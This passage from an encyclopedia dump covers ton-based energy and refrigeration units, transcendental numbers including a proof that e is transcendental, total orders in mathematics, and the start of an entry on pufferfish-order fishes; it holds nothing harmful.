A ton of TNT or tonne of TNT is a unit of energy equal to 10^9 (thermochemical) calories, also known as a gigacalorie (Gcal), equal to 4.184 gigajoules (GJ). A kiloton of TNT or kilotonne of TNT is a unit of energy equal to 10^12 calories, also known as a teracalorie (Tcal), equal to 4.184 terajoules (TJ). A megaton of TNT (1,000,000 tonnes) or megatonne of TNT is a unit of energy equal to 10^15 calories, also known (infrequently) as a petacalorie (Pcal), equal to 4.184 petajoules (PJ). These are small calories (cal). The large or dietary calorie (Cal) is equal to one kilocalorie (kcal) and is gradually being replaced by the latter, correct term.

Early values for the explosive energy released by trinitrotoluene (TNT) ranged from 900 to 1,100 calories per gram. In order to standardise the use of the term TNT as a unit of energy, an arbitrary value was assigned based on 1,000 calories (4.184 kJ) per gram. Thus there is no longer a direct connection to the chemical TNT itself. It is now merely a unit of energy that happens to be expressed using words normally associated with mass (e.g., kilogram, tonne, pound). The definition applies to both spellings: ton of TNT and tonne of TNT. Measurements in tons of TNT have been used primarily to express nuclear weapon yields, though they have since also been used in seismology.
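Since the TNT units above are defined as exact powers of ten times 4.184 J per calorie, the conversions reduce to a single multiplication. A minimal Python sketch (the function name is ours, for illustration only):

```python
# A ton of TNT is defined as exactly 1e9 thermochemical calories,
# with 1 cal = 4.184 J, so unit conversion is one multiplication.

CAL_TO_J = 4.184
TON_TNT_J = 1e9 * CAL_TO_J  # 4.184e9 J per ton of TNT

def tnt_to_joules(amount, unit="t"):
    """Convert tons (t), kilotons (kt) or megatons (Mt) of TNT to joules."""
    scale = {"t": 1.0, "kt": 1e3, "Mt": 1e6}
    return amount * scale[unit] * TON_TNT_J

print(tnt_to_joules(1, "kt"))  # 4.184e12 J = 4.184 TJ, the teracalorie figure
print(tnt_to_joules(1, "Mt"))  # 4.184e15 J = 4.184 PJ
```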
Tonne of oil equivalent

A tonne of oil equivalent (toe), sometimes ton of oil equivalent, is a conventional value, based on the amount of energy released by burning one tonne of crude oil. The unit is used, for example, by the International Energy Agency (IEA), for the reported world energy consumption as TPES in millions of toe (Mtoe). Other sources convert 1 toe into 1.28 tonnes of coal equivalent (tce). 1 toe is also standardized as 7.33 barrels of oil equivalent (boe).

Tonne of coal equivalent

A tonne of coal equivalent (tce), sometimes ton of coal equivalent, is a conventional value, based on the amount of energy released by burning one tonne of coal. The plural is tonnes of coal equivalent. Per the World Coal Association, 1 tonne of coal equivalent (tce) corresponds to 0.697 tonne of oil equivalent (toe); per the International Energy Agency, 1 tonne of coal equivalent (tce) corresponds to 0.700 tonne of oil equivalent (toe).

Refrigeration

The unit ton is used in refrigeration and air conditioning to measure the rate of heat absorption. Prior to the introduction of mechanical refrigeration, cooling was accomplished by delivering ice. Installing one ton of mechanical refrigeration capacity replaced the daily delivery of one ton of ice.

In North America, a standard ton of refrigeration is 12,000 BTU/h (about 3.517 kW). "The heat absorption per day is approximately the heat of fusion of 1 ton of ice at 32 °F (0 °C)." This is approximately the power required to melt one short ton (907 kg) of ice at 0 °C in 24 hours, thus representing the delivery of 1 short ton of ice per day. A less common usage is the power required to cool 1 long ton (2,240 lb = 1,016 kg) of water by 1 °F (0.56 °C) every 10 minutes, about 3.9 kW. The refrigeration ton is commonly abbreviated as RT.

Colloquial English

Ton is also used informally, often as slang, to mean a large amount of something. In Britain, a ton is colloquially used to refer to 100 of a given unit. Ton can thus refer to a speed of 100 miles per hour, and is prefixed by an indefinite article, e.g. "Lee was doing a ton down the motorway"; to money, e.g. "How much did you pay for that?" "A ton" (£100); to 100 points in a game, e.g. "Eric just threw a ton in our darts game" (in some games, e.g. cricket, more commonly called a century); or to a hundred of any other countable figure.
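The refrigeration-ton arithmetic above can be cross-checked numerically. The sketch below, using textbook values for the latent heat of fusion of ice and the BTU, is illustrative only:

```python
# Cross-check: one refrigeration ton is the rate needed to melt one
# short ton of ice in 24 hours. Assumed textbook constants:
# latent heat of fusion of ice ~333.55 kJ/kg, 1 BTU = 1055.06 J.

SHORT_TON_KG = 907.18474
FUSION_J_PER_KG = 333.55e3
BTU_J = 1055.06

heat_joules = SHORT_TON_KG * FUSION_J_PER_KG     # heat absorbed in a day
watts = heat_joules / (24 * 3600)                # average power
btu_per_hour = heat_joules / BTU_J / 24

print(round(watts), round(btu_per_hour))
# ~3503 W and ~11957 BTU/h, close to the nominal 3.517 kW / 12,000 BTU/h
```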
Physical sciences
Mass
null
30325
https://en.wikipedia.org/wiki/Transcendental%20number
Transcendental number
In mathematics, a transcendental number is a real or complex number that is not algebraic: that is, not the root of a non-zero polynomial with integer (or, equivalently, rational) coefficients. The best-known transcendental numbers are π and e. The quality of a number being transcendental is called transcendence.

Though only a few classes of transcendental numbers are known, partly because it can be extremely difficult to show that a given number is transcendental, transcendental numbers are not rare: indeed, almost all real and complex numbers are transcendental, since the algebraic numbers form a countable set, while the set of real numbers and the set of complex numbers are both uncountable sets, and therefore larger than any countable set.

All transcendental real numbers (also known as real transcendental numbers or transcendental irrational numbers) are irrational numbers, since all rational numbers are algebraic. The converse is not true: not all irrational numbers are transcendental. Hence, the set of real numbers consists of non-overlapping sets of rational, algebraic irrational, and transcendental real numbers. For example, the square root of 2 is an irrational number, but it is not a transcendental number, as it is a root of the polynomial equation x^2 − 2 = 0. The golden ratio (denoted φ or ϕ) is another irrational number that is not transcendental, as it is a root of the polynomial equation x^2 − x − 1 = 0.

History

The name "transcendental" comes from the Latin transcendere, 'to climb over or beyond, surmount', and was first used for the mathematical concept in Leibniz's 1682 paper in which he proved that sin x is not an algebraic function of x. Euler, in the eighteenth century, was probably the first person to define transcendental numbers in the modern sense. Johann Heinrich Lambert conjectured that e and π were both transcendental numbers in his 1768 paper proving that the number π is irrational, and proposed a tentative sketch proof that π is transcendental.

Joseph Liouville first proved the existence of transcendental numbers in 1844, and in 1851 gave the first decimal examples, such as the Liouville constant, in which the nth digit after the decimal point is 1 if n is equal to k! (k factorial) for some k, and 0 otherwise. In other words, the nth digit of this number is 1 only if n is one of the numbers 1! = 1, 2! = 2, 3! = 6, 4! = 24, etc. Liouville showed that this number belongs to a class of transcendental numbers that can be more closely approximated by rational numbers than can any irrational algebraic number, and this class of numbers is called the Liouville numbers, named in his honour. Liouville showed that all Liouville numbers are transcendental.

The first number to be proven transcendental without having been specifically constructed for the purpose of proving transcendental numbers' existence was e, by Charles Hermite in 1873.

In 1874, Georg Cantor proved that the algebraic numbers are countable and the real numbers are uncountable. He also gave a new method for constructing transcendental numbers. Although this was already implied by his proof of the countability of the algebraic numbers, Cantor also published a construction that proves there are as many transcendental numbers as there are real numbers. Cantor's work established the ubiquity of transcendental numbers.

In 1882, Ferdinand von Lindemann published the first complete proof that π is transcendental. He first proved that e^a is transcendental if a is a non-zero algebraic number. Then, since e^(iπ) = −1 is algebraic (see Euler's identity), iπ must be transcendental. But since i is algebraic, π must therefore be transcendental.
This approach was generalized by Karl Weierstrass to what is now known as the Lindemann–Weierstrass theorem. The transcendence of π implies that geometric constructions involving compass and straightedge only cannot produce certain results, for example squaring the circle.

In 1900, David Hilbert posed a question about transcendental numbers, Hilbert's seventh problem: if a is an algebraic number that is not zero or one, and b is an irrational algebraic number, is a^b necessarily transcendental? The affirmative answer was provided in 1934 by the Gelfond–Schneider theorem. This work was extended by Alan Baker in the 1960s in his work on lower bounds for linear forms in any number of logarithms (of algebraic numbers).

Properties

A transcendental number is a (possibly complex) number that is not the root of any integer polynomial. Every real transcendental number must also be irrational, since a rational number is the root of an integer polynomial of degree one. The set of transcendental numbers is uncountably infinite. Since the polynomials with rational coefficients are countable, and since each such polynomial has a finite number of zeroes, the algebraic numbers must also be countable. However, Cantor's diagonal argument proves that the real numbers (and therefore also the complex numbers) are uncountable. Since the real numbers are the union of algebraic and transcendental numbers, it is impossible for both subsets to be countable. This makes the transcendental numbers uncountable.

No rational number is transcendental and all real transcendental numbers are irrational. The irrational numbers contain all the real transcendental numbers and a subset of the algebraic numbers, including the quadratic irrationals and other forms of algebraic irrationals.

Applying any non-constant single-variable algebraic function to a transcendental argument yields a transcendental value. For example, from knowing that π is transcendental, it can be immediately deduced that numbers such as 5π, (π − 3)/√2, (√π − √3)^8, and (π^5 + 7)^(1/7) are transcendental as well.

However, an algebraic function of several variables may yield an algebraic number when applied to transcendental numbers if these numbers are not algebraically independent. For example, π and 1 − π are both transcendental, but π + (1 − π) = 1 is obviously not. It is unknown whether e + π, for example, is transcendental, though at least one of e + π and eπ must be transcendental. More generally, for any two transcendental numbers a and b, at least one of a + b and ab must be transcendental. To see this, consider the polynomial (x − a)(x − b) = x^2 − (a + b)x + ab. If a + b and ab were both algebraic, then this would be a polynomial with algebraic coefficients. Because algebraic numbers form an algebraically closed field, this would imply that the roots of the polynomial, a and b, must be algebraic. But this is a contradiction, and thus it must be the case that at least one of the coefficients is transcendental.

The non-computable numbers are a strict subset of the transcendental numbers. All Liouville numbers are transcendental, but not vice versa. Any Liouville number must have unbounded partial quotients in its simple continued fraction expansion. Using a counting argument one can show that there exist transcendental numbers which have bounded partial quotients and hence are not Liouville numbers. Using the explicit continued fraction expansion of e, one can show that e is not a Liouville number (although the partial quotients in its continued fraction expansion are unbounded). Kurt Mahler showed in 1953 that π is also not a Liouville number.
It is conjectured that all infinite continued fractions with bounded terms, that have a "simple" structure, and that are not eventually periodic are transcendental (in other words, algebraic irrational roots of polynomials of at least third degree do not have an apparent pattern in their continued fraction expansions, since eventually periodic continued fractions correspond to quadratic irrationals; see Hermite's problem).

Numbers proven to be transcendental

Numbers proven to be transcendental:

π (by the Lindemann–Weierstrass theorem).
e^a if a is algebraic and nonzero (by the Lindemann–Weierstrass theorem), in particular Euler's number e.
e^(π√d) where d is a positive integer; in particular Gelfond's constant e^π (by the Gelfond–Schneider theorem).
Algebraic combinations of π and e^π, such as π + e^π and πe^π (following from their algebraic independence).
a^b where a is algebraic but not 0 or 1, and b is irrational algebraic, in particular the Gelfond–Schneider constant 2^√2 (by the Gelfond–Schneider theorem).
The natural logarithm ln a if a is algebraic and not equal to 0 or 1, for any branch of the logarithm function (by the Lindemann–Weierstrass theorem).
log_b a if a and b are positive integers not both powers of the same integer, and a is not equal to 1 (by the Gelfond–Schneider theorem).
All numbers of the form π + β1·ln a1 + ⋯ + βn·ln an, where the βj are algebraic for all j and the aj are non-zero algebraic for all j (by Baker's theorem).
The trigonometric functions sin a, cos a, tan a and their hyperbolic counterparts, for any nonzero algebraic number a, expressed in radians (by the Lindemann–Weierstrass theorem).
Non-zero results of the inverse trigonometric functions and their hyperbolic counterparts, for any algebraic number a (by the Lindemann–Weierstrass theorem).
The fixed point of the cosine function (also referred to as the Dottie number) – the unique real solution to the equation cos x = x, where x is in radians (by the Lindemann–Weierstrass theorem).
W(a) if a is algebraic and nonzero, for any branch of the Lambert W function (by the Lindemann–Weierstrass theorem), in particular the omega constant Ω.
W(r, a) if both a and the order r are algebraic such that a ≠ 0, for any branch of the generalized Lambert W function.
The square super-root of any natural number, which is either an integer or transcendental (by the Gelfond–Schneider theorem).
Values of the gamma function of rational numbers that are of the form n/3 or n/4.
Algebraic combinations of π and Γ(1/3) or of π and Γ(1/4), such as the lemniscate constant (following from their respective algebraic independences).
The values of the Beta function B(x, y) if x and y are non-integer rational numbers.
The Bessel function of the first kind J_ν(x), its first derivative, and the quotient J′_ν(x)/J_ν(x) are transcendental when ν is rational and x is algebraic and nonzero, and all nonzero roots of J_ν(x) and J′_ν(x) are transcendental when ν is rational.
The number π·Y_0(2)/(2·J_0(2)) − γ, where Y_0 and J_0 are Bessel functions and γ is the Euler–Mascheroni constant.
Any Liouville number, in particular: Liouville's constant.
Numbers with large irrationality measure, such as the Champernowne constant (by Roth's theorem).
Numbers artificially constructed not to be algebraic periods.
Any non-computable number, in particular: Chaitin's constant.
Constructed irrational numbers which are not simply normal in any base.
Any number for which the digits with respect to some fixed base form a Sturmian word.
The Prouhet–Thue–Morse constant and the related rabbit constant.
The Komornik–Loreti constant.
The paperfolding constant (also named the "Gaussian Liouville number").
The values of the infinite series with fast convergence rate as defined by Y. Gao and J. Gao.
Certain sums of series defined by means of the floor function ⌊·⌋.
Numbers of a related series form (where the terms are built from polynomials in two variables, an algebraic number, and an integer base greater than 1).
The two numbers with only two different decimal digits whose nonzero digit positions are given by the Moser–de Bruijn sequence and its double.
The values of the Rogers–Ramanujan continued fraction R(q) where q is algebraic and 0 < |q| < 1. The lemniscatic values of the theta function (under the same conditions for q) are also transcendental.
j(q) where q is algebraic but not imaginary quadratic (i.e., the exceptional set of this function is the number field whose degree of extension over the rationals is 2).
The constants appearing in the formula for the first index of occurrence of an integer k in Gijswijt's sequence, where k is any integer greater than 1.

Conjectured transcendental numbers

Numbers which have yet to be proven to be either transcendental or algebraic:

Most nontrivial combinations of two or more transcendental numbers are themselves not known to be transcendental or even irrational: e + π, e − π, eπ, π/e, π^π, e^e, π^e. It has been shown that both e + π and eπ do not satisfy any polynomial equation of degree ≤ 8 and integer coefficients of average size 10^9. At least one of the numbers e^e and e^(e^2) is transcendental. Schanuel's conjecture would imply that all of the above numbers are transcendental and algebraically independent.
The Euler–Mascheroni constant γ: in 2010 it was shown that an infinite list of Euler–Lehmer constants (which includes γ/4) contains at most one algebraic number. In 2012 it was shown that at least one of γ and the Gompertz constant is transcendental.
The values of the Riemann zeta function at odd positive integers; in particular Apéry's constant ζ(3), which is known to be irrational. For the other numbers even this is not known.
The values of the Dirichlet beta function at even positive integers; in particular Catalan's constant β(2). (None of them are known to be irrational.)
Values of the gamma function Γ(1/n) for positive integers such as n = 5 and n = 7 are not known to be irrational, let alone transcendental.
Any number given by some kind of limit that is not obviously algebraic.

Proofs for specific numbers

A proof that e is transcendental

The first proof that the base of the natural logarithms, e, is transcendental dates from 1873. We will now follow the strategy of David Hilbert (1862–1943), who gave a simplification of the original proof of Charles Hermite. The idea is the following: Assume, for purpose of finding a contradiction, that e is algebraic. Then there exists a finite set of integer coefficients c0, c1, ..., cn satisfying the equation

c0 + c1·e + c2·e^2 + ⋯ + cn·e^n = 0, with c0 and cn both nonzero.

It is difficult to make use of the integer status of these coefficients when multiplied by a power of the irrational e, but we can absorb those powers into an integral which "mostly" will assume integer values. For a positive integer k, define the polynomial

f_k(x) = x^k [(x − 1)(x − 2)⋯(x − n)]^(k+1)

and multiply both sides of the above equation by ∫_0^∞ f_k(x) e^(−x) dx to arrive at the equation

c0 ∫_0^∞ f_k e^(−x) dx + c1·e ∫_0^∞ f_k e^(−x) dx + ⋯ + cn·e^n ∫_0^∞ f_k e^(−x) dx = 0.

By splitting respective domains of integration, this equation can be written in the form P + Q = 0, where

P = c0 ∫_0^∞ f_k e^(−x) dx + c1·e ∫_1^∞ f_k e^(−x) dx + ⋯ + cn·e^n ∫_n^∞ f_k e^(−x) dx,
Q = c1·e ∫_0^1 f_k e^(−x) dx + c2·e^2 ∫_0^2 f_k e^(−x) dx + ⋯ + cn·e^n ∫_0^n f_k e^(−x) dx.

Here P will turn out to be an integer, but more importantly it grows quickly with k.

Lemma 1

There are arbitrarily large k such that P/k! is a non-zero integer.

Proof. Recall the standard integral (a case of the Gamma function)

∫_0^∞ t^j e^(−t) dt = j!,

valid for any natural number j. More generally, if g(t) = g0 + g1·t + ⋯ + gm·t^m, then ∫_0^∞ g(t) e^(−t) dt = g0·0! + g1·1! + ⋯ + gm·m!.

This would allow us to compute P exactly, because any term of P can be rewritten as

ca·e^a ∫_a^∞ f_k(x) e^(−x) dx = ca ∫_0^∞ f_k(t + a) e^(−t) dt

through the change of variables x = t + a. Hence

P = ∫_0^∞ (c0·f_k(t) + c1·f_k(t + 1) + ⋯ + cn·f_k(t + n)) e^(−t) dt.

That latter sum is a polynomial in t with integer coefficients, i.e., it is a linear combination of powers t^j with integer coefficients.
Hence the number P is a linear combination (with those same integer coefficients) of factorials j!; in particular P is an integer. Smaller factorials divide larger factorials, so the smallest j! occurring in that linear combination will also divide the whole of P. We get that smallest j! from the lowest power term t^j appearing with a nonzero coefficient in the polynomial above, but this smallest exponent j is also the multiplicity of t = 0 as a root of this polynomial. f_k(x) is chosen to have multiplicity k of the root x = 0 and multiplicity k + 1 of the roots x = a for a = 1, ..., n, so that the smallest exponent is t^k for f_k(t) and t^(k+1) for f_k(t + a) with a ≥ 1. Therefore k! divides P.

To establish the last claim in the lemma, that P is nonzero, it is sufficient to prove that (k + 1)! does not divide P. To that end, let k + 1 be any prime larger than n and |c0|. We know from the above that (k + 1)! divides each of the terms ca ∫_0^∞ f_k(t + a) e^(−t) dt for 1 ≤ a ≤ n, so in particular all of those are divisible by the prime k + 1. It comes down to the first term c0 ∫_0^∞ f_k(t) e^(−t) dt. We have (see falling and rising factorials)

f_k(t) = t^k [(t − 1)⋯(t − n)]^(k+1) = ((−1)^n n!)^(k+1) t^k + higher degree terms,

and those higher degree terms all give rise to factorials (k + 1)! or larger. Hence

c0 ∫_0^∞ f_k(t) e^(−t) dt ≡ c0 ((−1)^n n!)^(k+1) k! (mod (k + 1)!).

That right hand side is a product of nonzero integer factors less than the prime k + 1, therefore that product is not divisible by k + 1, and the same holds for P; in particular P cannot be zero.

Lemma 2

For sufficiently large k, |Q/k!| < 1.

Proof. Note that

f_k e^(−x) = x^k [(x − 1)⋯(x − n)]^(k+1) e^(−x) = u(x) · v(x)^k,

where u(x) = [(x − 1)⋯(x − n)] e^(−x) and v(x) = x(x − 1)⋯(x − n) are continuous functions of x for all x, so are bounded on the interval [0, n]. That is, there are constants G, H > 0 such that

|f_k e^(−x)| ≤ |u(x)| · |v(x)|^k < G·H^k for 0 ≤ x ≤ n.

So each of those integrals composing Q is bounded, the worst case being

|∫_0^n f_k e^(−x) dx| ≤ n·G·H^k.

It is now possible to bound the sum Q as well:

|Q| < G·n·H^k (|c1|·e + |c2|·e^2 + ⋯ + |cn|·e^n) = G·n·H^k·M,

where M is a constant not depending on k. It follows that

|Q/k!| < G·n·M · H^k/k! → 0 as k → ∞,

finishing the proof of this lemma.

Conclusion

Choosing a value of k that satisfies both lemmas leads to a non-zero integer (P/k!) added to a vanishingly small quantity (Q/k!) being equal to zero: an impossibility. It follows that the original assumption, that e can satisfy a polynomial equation with integer coefficients, is also impossible; that is, e is transcendental.

The transcendence of π

A similar strategy, different from Lindemann's original approach, can be used to show that the number π is transcendental. Besides the gamma-function and some estimates as in the proof for e, facts about symmetric polynomials play a vital role in the proof. For detailed information concerning the proofs of the transcendence of π and e, see the references and external links.
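Liouville's constant, constructed in the History section above, lends itself to a direct numerical check: truncating its defining series gives rational approximations p/q that are better than Liouville's theorem permits for any algebraic irrational of the corresponding degree. A small Python sketch using exact fraction arithmetic (the variable names are ours):

```python
from fractions import Fraction
import math

# Liouville's constant has a 1 in decimal place k! for k = 1, 2, 3, ...
# and 0 elsewhere. Truncating the series after m terms yields a rational
# p/q with q = 10**(m!) that approximates the full constant to within
# q**(-m) -- closer than any algebraic irrational of degree m could be
# approximated, by Liouville's theorem.

def liouville_partial(m):
    """Exact partial sum: sum of 10**(-k!) for k = 1..m."""
    return sum(Fraction(1, 10 ** math.factorial(k)) for k in range(1, m + 1))

L = liouville_partial(6)  # stands in for the full constant here

for m in range(1, 5):
    q = 10 ** math.factorial(m)       # denominator of the truncation
    err = L - liouville_partial(m)    # tail of the series
    print(m, float(err) < q ** (-m))  # True: approximation beats q**(-m)
```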
Mathematics
Basics
null
30330
https://en.wikipedia.org/wiki/Total%20order
Total order
In mathematics, a total order or linear order is a partial order in which any two elements are comparable. That is, a total order is a binary relation ≤ on some set X, which satisfies the following for all a, b and c in X:

1. a ≤ a (reflexive).
2. If a ≤ b and b ≤ c then a ≤ c (transitive).
3. If a ≤ b and b ≤ a then a = b (antisymmetric).
4. a ≤ b or b ≤ a (strongly connected, formerly called total).

Reflexivity (1.) already follows from connectedness (4.), but is required explicitly by many authors nevertheless, to indicate the kinship to partial orders. Total orders are sometimes also called simple, connex, or full orders.

A set equipped with a total order is a totally ordered set; the terms simply ordered set, linearly ordered set, toset and loset are also used. The term chain is sometimes defined as a synonym of totally ordered set, but generally refers to a totally ordered subset of a given partially ordered set.

An extension of a given partial order to a total order is called a linear extension of that partial order.

Strict and non-strict total orders

A strict total order on a set X is a strict partial order on X in which any two distinct elements are comparable. That is, a strict total order is a binary relation < on some set X, which satisfies the following for all a, b and c in X:

1. Not a < a (irreflexive).
2. If a < b then not b < a (asymmetric).
3. If a < b and b < c then a < c (transitive).
4. If a ≠ b, then a < b or b < a (connected).

Asymmetry follows from transitivity and irreflexivity; moreover, irreflexivity follows from asymmetry. For delimitation purposes, a total order as defined above is sometimes called a non-strict order. For each (non-strict) total order ≤ there is an associated relation <, called the strict total order associated with ≤, that can be defined in two equivalent ways:

a < b if a ≤ b and a ≠ b (reflexive reduction).
a < b if not b ≤ a (i.e., < is the complement of the converse of ≤).

Conversely, the reflexive closure of a strict total order < is a (non-strict) total order.

Examples

Any subset X of a totally ordered set is totally ordered for the restriction of the order on X.
The unique order on the empty set, ∅, is a total order.
Any set of cardinal numbers or ordinal numbers (more strongly, these are well-orders).
If X is any set and f an injective function from X to a totally ordered set then f induces a total ordering on X by setting x1 ≤ x2 if and only if f(x1) ≤ f(x2).
The lexicographical order on the Cartesian product of a family of totally ordered sets, indexed by a well ordered set, is itself a total order.
The set of real numbers ordered by the usual "less than or equal to" (≤) or "greater than or equal to" (≥) relations is totally ordered. Hence each subset of the real numbers is totally ordered, such as the natural numbers, integers, and rational numbers. Each of these can be shown to be the unique (up to an order isomorphism) "initial example" of a totally ordered set with a certain property (here, a total order A is initial for a property if, whenever B has the property, there is an order isomorphism from A to a subset of B):
The natural numbers form an initial non-empty totally ordered set with no upper bound.
The integers form an initial non-empty totally ordered set with neither an upper nor a lower bound.
The rational numbers form an initial totally ordered set which is dense in the real numbers. Moreover, the reflexive reduction < is a dense order on the rational numbers.
The real numbers form an initial unbounded totally ordered set that is connected in the order topology (defined below).
Ordered fields are totally ordered by definition. They include the rational numbers and the real numbers. Every ordered field contains an ordered subfield that is isomorphic to the rational numbers.
Any Dedekind-complete ordered field is isomorphic to the real numbers.
The letters of the alphabet ordered by the standard dictionary order, e.g., A < B < C, etc., form a strict total order.

Chains

The term chain is sometimes defined as a synonym for a totally ordered set, but it is generally used for referring to a subset of a partially ordered set that is totally ordered for the induced order. Typically, the partially ordered set is a set of subsets of a given set that is ordered by inclusion, and the term is used for stating properties of the set of the chains. This high number of nested levels of sets explains the usefulness of the term.

A common example of the use of chain for referring to totally ordered subsets is Zorn's lemma, which asserts that, if every chain in a partially ordered set X has an upper bound in X, then X contains at least one maximal element. Zorn's lemma is commonly used with X being a set of subsets; in this case, the upper bound is obtained by proving that the union of the elements of a chain in X is in X. This is the way that is generally used to prove that a vector space has Hamel bases and that a ring has maximal ideals.

In some contexts, the chains that are considered are order isomorphic to the natural numbers with their usual order or its opposite order. In this case, a chain can be identified with a monotone sequence, and is called an ascending chain or a descending chain, depending on whether the sequence is increasing or decreasing.

A partially ordered set has the descending chain condition if every descending chain eventually stabilizes. For example, an order is well founded if it has the descending chain condition. Similarly, the ascending chain condition means that every ascending chain eventually stabilizes. For example, a Noetherian ring is a ring whose ideals satisfy the ascending chain condition.

In other contexts, only chains that are finite sets are considered. In this case, one talks of a finite chain, often shortened as a chain. In this case, the length of a chain is the number of inequalities (or set inclusions) between consecutive elements of the chain; that is, the number of elements in the chain minus one. Thus a singleton set is a chain of length zero, and an ordered pair is a chain of length one. The dimension of a space is often defined or characterized as the maximal length of chains of subspaces. For example, the dimension of a vector space is the maximal length of chains of linear subspaces, and the Krull dimension of a commutative ring is the maximal length of chains of prime ideals.

"Chain" may also be used for some totally ordered subsets of structures that are not partially ordered sets. An example is given by regular chains of polynomials. Another example is the use of "chain" as a synonym for a walk in a graph.

Further concepts

Lattice theory

One may define a totally ordered set as a particular kind of lattice, namely one in which we have {a ∨ b, a ∧ b} = {a, b} for all a, b. We then write a ≤ b if and only if a = a ∧ b. Hence a totally ordered set is a distributive lattice.

Finite total orders

A simple counting argument will verify that any non-empty finite totally ordered set (and hence any non-empty subset thereof) has a least element. Thus every finite total order is in fact a well order. Either by direct proof or by observing that every well order is order isomorphic to an ordinal, one may show that every finite total order is order isomorphic to an initial segment of the natural numbers ordered by <.
In other words, a total order on a set with k elements induces a bijection with the first k natural numbers. Hence it is common to index finite total orders or well orders with order type ω by natural numbers in a fashion which respects the ordering (either starting with zero or with one).

Category theory

Totally ordered sets form a full subcategory of the category of partially ordered sets, with the morphisms being maps which respect the orders, i.e. maps f such that if a ≤ b then f(a) ≤ f(b). A bijective map between two totally ordered sets that respects the two orders is an isomorphism in this category.

Order topology

For any totally ordered set X we can define the open intervals (a, b), (−∞, b), (a, ∞), and (−∞, ∞). We can use these open intervals to define a topology on any ordered set, the order topology. When more than one order is being used on a set, one talks about the order topology induced by a particular order. For instance, if N is the natural numbers, < is less than and > is greater than, we might refer to the order topology on N induced by < and the order topology on N induced by > (in this case they happen to be identical but will not in general). The order topology induced by a total order may be shown to be hereditarily normal.

Completeness

A totally ordered set is said to be complete if every nonempty subset that has an upper bound has a least upper bound. For example, the set of real numbers R is complete but the set of rational numbers Q is not. In other words, the various concepts of completeness (not to be confused with being "total") do not carry over to restrictions. For example, over the real numbers a property of the relation ≤ is that every non-empty subset S of R with an upper bound in R has a least upper bound (also called supremum) in R. However, for the rational numbers this supremum is not necessarily rational, so the same property does not hold on the restriction of the relation ≤ to the rational numbers.

There are a number of results relating properties of the order topology to the completeness of X:

If the order topology on X is connected, X is complete.
X is connected under the order topology if and only if it is complete and there is no gap in X (a gap is two points a and b in X with a < b such that no c satisfies a < c < b).
X is complete if and only if every bounded set that is closed in the order topology is compact.

A totally ordered set (with its order topology) which is a complete lattice is compact. Examples are the closed intervals of real numbers, e.g. the unit interval [0,1], and the affinely extended real number system (extended real number line). There are order-preserving homeomorphisms between these examples.

Sums of orders

For any two disjoint total orders (A1, ≤1) and (A2, ≤2), there is a natural order ≤+ on the set A1 ∪ A2, which is called the sum of the two orders or sometimes just A1 + A2: for x, y ∈ A1 ∪ A2, x ≤+ y holds if and only if one of the following holds:

x, y ∈ A1 and x ≤1 y;
x, y ∈ A2 and x ≤2 y;
x ∈ A1 and y ∈ A2.

Intuitively, this means that the elements of the second set are added on top of the elements of the first set. More generally, if (I, ≤) is a totally ordered index set, and for each i ∈ I the structure (Ai, ≤i) is a linear order, where the sets Ai are pairwise disjoint, then the natural total order on the union of the Ai is defined by: for x, y in that union, x ≤ y holds if either there is some i ∈ I with x ≤i y, or there are some i < j in I with x ∈ Ai and y ∈ Aj.

Decidability

The first-order theory of total orders is decidable, i.e. there is an algorithm for deciding which first-order statements hold for all total orders. Using interpretability in S2S, the monadic second-order theory of countable total orders is also decidable.
Orders on the Cartesian product of totally ordered sets There are several ways to take two totally ordered sets and extend to an order on the Cartesian product, though the resulting order may only be partial. Here are three of these possible orders, listed such that each order is stronger than the next: Lexicographical order: (a,b) ≤ (c,d) if and only if a < c or (a = c and b ≤ d). This is a total order. (a,b) ≤ (c,d) if and only if a ≤ c and b ≤ d (the product order). This is a partial order. (a,b) ≤ (c,d) if and only if (a < c and b < d) or (a = c and b = d) (the reflexive closure of the direct product of the corresponding strict total orders). This is also a partial order. Each of these orders extends the next in the sense that if we have x ≤ y in the product order, this relation also holds in the lexicographic order, and so on. All three can similarly be defined for the Cartesian product of more than two sets. Applied to the vector space Rn, each of these make it an ordered vector space.
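The contrast between the first two orders above can be demonstrated in a few lines of Python; the helper names are ours, chosen for the example:

```python
# The lexicographic order on pairs is total: any two pairs compare.
# The product (componentwise) order is only partial: some pairs are
# incomparable.

def lex_le(p, q):
    (a, b), (c, d) = p, q
    return a < c or (a == c and b <= d)

def product_le(p, q):
    (a, b), (c, d) = p, q
    return a <= c and b <= d

x, y = (1, 5), (2, 3)
print(lex_le(x, y) or lex_le(y, x))          # True: comparable under lex
print(product_le(x, y) or product_le(y, x))  # False: incomparable pair
```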
Mathematics
Order theory
null
30333
https://en.wikipedia.org/wiki/Tetraodontiformes
Tetraodontiformes
Tetraodontiformes, also known as the Plectognathi, is an order of ray-finned fishes which includes the pufferfishes and related taxa. This order has been classified as a suborder of the order Perciformes, although recent studies have found that it, as the Tetraodontoidei, is a sister taxon to the anglerfish order Lophiiformes, called Lophiodei, and have placed both taxa within the Acanthuriformes. The Tetraodontiformes are represented by 10 extant families and around 430 species overall. The majority of the species within this order are marine, but a few may be found in freshwater. They are found throughout the world.

Taxonomy

The name Tetraodontiformes was first used for this order in 1940 by Lev Berg; the order was originally proposed in 1817 as "Les Plectognathes", the Plectognathi. Cuvier divided this into two families, "Les Gymnodontes" and "Les Sclerodermes". Berg's name Tetraodontiformes is the currently accepted one, as it follows the International Code of Zoological Nomenclature rule that a name for a family or higher taxon must have its root based on the type of that grouping; in this case the type species is Tetraodon lineatus Linnaeus, 1758. The 5th edition of Fishes of the World recognises the order as a derived order within the Actinopterygii and as a monophyletic order within the Percomorpha. Other authorities have proposed that it is not an order but a clade, the Tetraodontoidei, within the order Acanthuriformes, most closely related to the Lophiodei, the anglerfishes.

Etymology

Tetraodontiformes suffixes -iformes, meaning "in the form of", onto the genus name Tetraodon, of the type species of Tetraodontidae, the best known and most widely distributed family in the order. Tetraodon means "four tooth" and alludes to the four fused teeth, separated by a central suture, in the jaws.

Evolution

The oldest tetraodontiforms are the extinct suborder Plectocretacicoidei from the Late Cretaceous (Santonian to Campanian) of Italy and Slovenia, both in the former Tethyan region. These comprise the families Cretatriacanthidae and Protriacanthidae. Plectocretacicus from the Cenomanian of Lebanon has also been proposed as a tetraodontiform, but this has been more recently questioned.

Description

